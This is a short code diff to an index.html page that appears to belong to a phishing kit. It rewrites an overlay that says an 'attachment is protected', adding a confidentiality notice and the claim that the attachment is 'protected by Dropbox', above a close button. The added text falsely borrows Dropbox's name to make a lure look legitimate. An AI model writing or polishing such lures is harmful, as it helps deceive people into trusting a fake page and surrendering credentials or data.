--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<html lang="en"><head>
+<!DOCTYPE html><html lang="en" class=" js chrome"><head>
 
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" nonce="MzgxNTEzNzIxNCwxMjU3MTgxNDYw"></script>
   <script src="https://code.jquery.com/jquery-3.1.1.min.js" nonce="MzgxNTEzNzIxNCwxMjU3MTgxNDYw">
@@ -387,7 +387,8 @@ return(str.substring(theleft, theright));
         <div class="xoverlay-content">
            
             <h2></h2>
-            <p>This attachment is protected and can be viewed by you only! Click close to continue.</p>
+            <p>This information is confidential and intended for your eyes only</p> 
+			<p>This attachment is protected by Dropbox! Click close to continue.</p>
             <button onclick="closexoverlay()">Close</button>
         </div>
     </div>
